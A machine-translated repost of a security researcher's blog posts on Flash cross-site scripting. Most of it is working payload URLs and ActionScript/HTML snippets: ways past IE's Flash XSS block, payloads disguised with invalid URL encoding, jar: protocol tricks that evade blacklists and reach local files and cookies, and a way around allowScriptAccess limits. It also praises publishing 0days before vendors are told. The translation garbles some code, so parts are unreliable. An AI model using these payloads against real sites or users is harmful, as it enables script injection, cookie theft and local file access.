Mramydnei · 2014/02/19 comeliness

0 x00 preface

The original link

Soroush.secproject.com/blog/2013/1…

Soroush.secproject.com/blog/2013/1…

Soroush.secproject.com/blog/2014/0…

You may feel a little familiar when you open this blog. Yes, this is the guy who discovered the secondary upload bug in FCK 2.6.8 ASP. Bloggers are funny people, and they often put out damaging 0days in speeches or articles before they have even informed manufacturers to fix them. If you haven’t followed this person before, maybe following them in the years ahead will give you some unexpected rewards.

0x01 Bypassing Flash XSS Protection By Internet Explorer

After some minor testing, it seems that only IE will block the following Flash XSS. If you open the following link with IE10:

http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
Copy the code

You should see the message Access is DENIED on the console (open it with F12). If you try to open the connection using Chrome,Firefox, or Opera, it’s no surprise that the box should pop up without any trouble.

Then I came up with a way to get around IE’s limitations:

http://0me.me/demo/xss/xssproject.swf?js=location.href='javascript:x="<script>alert(document.domain)</script>"'
Copy the code

“Javascript :x=”echo” “in the URL lets us print the echo on the current page. And we can get around this limitation by including some HTML tags like the above example.

0x02 Uses Flash’s URL decoding function to bypass some protection mechanisms

This works well if you need to send your vector to victims hidden behind firewalls (FlashVars can use # to hide themselves) or if you want to get past some client-side XSS defenses. This is all based on the fact that Flash will discard invalid urL-encoded characters.

(1) Flash discards two invalid hexadecimal characters (([^ 0-9a-fa-f])) after %, such as:

"%X" or "%="
Copy the code

(2) If a valid and an invalid hexadecimal character appears after %, three characters are discarded, such as:

"%AX" or "%A&"
Copy the code

Note: sometimes characters with an ASCII value greater than 127 are converted to question marks. This, of course, happens when the URL jumps. In addition, encoded BOM characters (” %EF%BB%BF “) can also be used to replace Spaces. For example, we could write “alert(1)” as “alert%EF%BB%BF(1)”.

Finally put it all together:

http://0me.me/demo/xss/xssproject.swf?%#js=al%A#e%Xrt(docum%A#ent.doma%A#in);

http://0me.me/demo/xss/xssproject.swf?%I%R%S%D%%Ljs=loca%Xtion.hr%Yef='jav%Zascri %AXpt:x="<sc%AYript>ale%AZrt(docu%?ment.dom%/ain)</sc%&ript>"'
Copy the code

Success! I also used this trick to bypass Noscript, but this vulnerability was fixed in 2.6.6.8.

0x03 True “Warrior” JAR protocol

Flash will ignore the JAR protocol and make it transparent. In other words javascript:alert(1) and JAR :javascript:alert(1) are exactly the same in ActionScript. This means that we can use this method to circumvent some blacklist detection. Let’s start with an example of a bug:

#! javascript varinput:String = root.loaderInfo.parameters.input; // input variable vardangerousInput:RegExp = /^\w\*script:.\*/i; // to cover javascript: and vbscript: protocols! if(! dangerousInput.test(input)) { // Safe to go? !!!!!!!!! --> No! What about "jar:javascript:"? navigateToURL(newURLRequest(input),"_self"); // redirection }Copy the code

We can bypass this detection using the previously mentioned method:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:javascript:alert(1); //Copy the code

Another technique that I think is well known is the use of data URIs in Firefox.

0x04 Use “navigateToURL” to break local access restrictions

By default flash will not allow you to access sensitive protocols (via navigateToURL) such as “File://” or “ms-its:” if you try to access the following link:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=file://c:\
Copy the code

You’ll get an error message like this:

SecurityError: Error #2148: SWF file http://0me.me/demo/xss/flash/link\_protocol\_test.swf? input=file://c:\ cannot access local resource file://c:\. Only local-with-filesystem and trusted local SWF files may access local resources. at global/flash.net::navigateToURL() at MethodInfo-1() at flash.events::EventDispatcher/dispatchEventFunction() at flash.events::EventDispatcher/dispatchEvent() at com.powerflasher.SampleApp::link\_protocol\_test()Copy the code

I’ve tried using the JAR protocol in Chrome, Firefox, and Internet Explorer to get around this limitation, but I haven’t had much success with the first two browsers. This means it only works with IE. Here are some examples of bypass:

Access C drive using jar protocol:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:file:/c:\
Copy the code

Open a file in drive C:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:file:/c:\windows\Starter.xml
Copy the code

Enable some restricted protocols:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:shell:cookies http://0me.me/demo/xss/flash/link_protocol_test.swf?input=jar:mk:@MSITStore:C:\Windows\Help\mui\0409\certmgr.CHM::/html/ 355962c2-4f6b-4cbd- ab00-6e7ee4dddc16.htmCopy the code

Use some other tricks to access the C drive:

http://0me.me/demo/xss/flash/link_protocol_test.swf?input=\\/c:/
Copy the code

So once these limits are broken, what kind of risks will be brought to users?

1. It is used for sensitive local file detection (detecting the type and version of anti-virus software, etc.) 2. Collect user information through directories and files. 3. Use Drag and drop to hijack sensitive local files (I can't give any good POC here) 4. Execute harmful local files (HTML., SWF, etc.) on behalf of the user. To enable data theft, remote code execution or other obscene things.Copy the code

Finally, a POC that pops open your CD-ROM (tested in IE10), just like some old virus, give it a try!

0 me. Me/demo/XSS/fl…

0x05 Bypass flash Sandbox

NavigateToURL and getUR are common tools in Flash XSS. But the big premise is that we need an allowScriptAccess to get permission for script access. I’ll show you how to get a script running without allowScriptAccess. But before we do that, let’s look at what the allowScriptAccess method should look like.

The first part is the AS code in Flash, and I’ll give examples of AS2 and AS3 respectively.

AS3:

#! javascript navigateToURL(new URLRequest("javascript:alert(document.domain);" ),"_self");Copy the code

AS2:

#! javascript getURL("javascript:alert(document.domain)","_self");Copy the code

Then our HTML page should look something like this:

#! html <objectwidth="320"height="240"classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"codebase="http://download.macromedia.c Om/pub/rest/cabs/flash/swflash cab# version = 6,0,40,0 "> < paramname =" allowScriptAccess "value =" always "/ > < paramname =" SRC" value="http://www.attacker.com/testme/flashtest/normalEmbededXSS.swf"/><embedwidth="320"height="240"type="application/x- shockwave-flash"src="http://www.attacker.com/testme/flashtest/normalEmbededXSS.swf"allowScriptAccess="always"/></object>Copy the code

Of course we can try to make it shorter:

#! html <object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" The codebase = "http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6, 0,40,0" > < param name = "SRC" value="//www.attacker.com/testme/flashtest/normalEmbededXSS.swf" /><embed width="320" height="240" type="application/x-shockwave-flash" src="//www.attacker.com/testme/flashtest/normalEmbededXSS.swf" />Copy the code

However, this example will cause errors in IE. If you want to see detailed error messages, you can try using the Debugger version of Flash. But we can use the Embed tag, like this:

#! html <object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" The codebase = "http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6, 0,40,0" > < param name="allowscriptaccess" value="always" /><param name="src" value="//0me.me/demo/xss/flash/normalEmbededXSS.swf" /><embed width="320" height="240" type="application/x-shockwave-flash" src="//0me.me/demo/xss/flash/normalEmbededXSS.swf" allowscriptaccess="always" /></object>Copy the code

With some preliminary knowledge of the ways to use allowScriptAccess, let’s take a look at the problems we run into if we don’t use it.

NavigateToURL or getURL can not be set to null/empty, “_self”, “_parent”, “_top”.

#! javascript navigateToURL(new URLRequest("http://google.com/"),"_self");Copy the code

2. We cannot use javascript to complete the jump

#! javascript navigateToURL(new URLRequest("javascript:alert(document.domain);" ),"testme");Copy the code

It seems that the first problem is not so difficult to solve. We can use tricks such as IFrame name, window.open, target of the A tag, or target of the form to solve this problem. The second problem can be solved by using a feature that previously ignored the JAR protocol in Flash. Now let’s try to put these things together.

AS3 example:

#! javascript navigateToURL(new URLRequest("jar:javascript:alert('domain: '+document.domain+'\\r\\nCookies: '+document.cookie);" ),"testme");Copy the code

AS2 example:

#! javascript getURL("jar:javascript:alert('domain: '+document.domain+'\\r\\nCookies: '+document.cookie);" ,"testme");Copy the code

Finally, let’s finish it. Suppose there is a page with XSS vulnerability as follows:

http://www.sdl.me/xssdemo/xss.asp?input=XSS_goes_here
Copy the code

If we don’t use name, then the following method only applies to Firefox.

http://www.sdl.me/xssdemo/xss.asp?input=<embed src=http://0me.me/demo/xss/flash/embededXSS.swf>
Copy the code

But we can also use name to make it executable in other browsers.

#! html <iframe name="testme" src="http://www.sdl.me/xssdemo/xss.asp?input=<embed src=http://0me.me/demo/xss/flash/embededXSS.swf>" height="240" width="320"></iframe>Copy the code

The Embed tag here can also be replaced by the Object tag. But eventually Adobe came up with a new patch that blocked the JAR protocol. I think it came out on the 17th of last month. So if you want to test it out for yourself you may need to manually install a slightly older version of Flash. If you’re a Kali Linux user who likes to use Firefox, this should be an easy way to bypass the Flash sandbox (I didn’t go out of my way to update FF’s Flash plugin, so it’s always possible in my case).